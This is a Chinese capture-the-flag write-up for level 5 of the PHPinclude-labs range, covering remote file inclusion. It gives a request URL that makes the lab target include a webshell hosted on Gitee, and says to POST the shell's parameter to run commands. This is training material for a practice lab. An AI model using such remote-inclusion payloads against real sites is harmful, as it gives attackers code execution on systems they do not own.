当前位置: 首页 > article >正文

[HelloCTF]PHPinclude-labs超详细WP-Level 5-http协议-2

article 2025/3/19 10:34:28

源码分析

  • 跟上一关一样, 没有任何变化

解题分析

  • 那变化在哪呢?

    • 其实变化在当前目录下的文件

    • 当前目录在不再有后门文件了

      • 不能再通过 127.0.0.1 和 靶机ip 来获取原本就存在的 WebShell

  • 所以需要自己在互联网上放一个 WebShell, 以便文件包含

    • 探姬贴心地已经在 Gitee 上准备好了 木马

    • https://gitee.com/Probius/PHPinclude-labs/raw/main/RFI

解题步骤

  • 使用远程文件包含, 包含上述地址, POST 传入对应参数即可

  • http://靶场ip?wrappers=gitee.com/Probius/PHPinclude-labs/raw/main/RFI


http://www.kler.cn/a/591036.html

相关文章:

  • Doris vs Elasticsearch:全维度对比与实际成本案例解析
  • Linux驱动开发实战(五):Qt应用程序点RGB灯(保姆级快速入门!)
  • 2000-2019年各省地方财政税收收入数据
  • 【HCIA-晴天老师】15-VLAN的Hybrid配置笔记
  • LeetCode 78.子集
  • Java Stream 流的介绍
  • 【Servo】一个简单的伺服驱动器嵌入式架构,联想
  • JVM G1内存管理核心概念解析:Region、Card Table、CSet与RSet
  • 机试准备第19天
  • Java1.8与testNg兼容问题:bad class file和SocketTimeoutException: Read timed out
  • synchronized底层加锁原理
  • HTTP服务器的工作逻辑
  • 力扣hot100_二分查找(1)_python版本
  • 小样本学习入门指南:以图像识别为例
  • 【数据结构之树】
  • PE(Processing Element,处理单元)在Vitis HLS中的应用与实现
  • 深入理解 Linux 的 top 命令:实时监控系统性能
  • Python绝美樱花树
  • 结合基于标签置信度的特征选择方法用于部分多标签学习-简介版
  • 第18章-综合以上功能 基于stm32的智能小车(远程控制、避障、循迹) 基于stm32f103c8t6_HAL库_CubeMX_超详细,包含代码讲解和原理图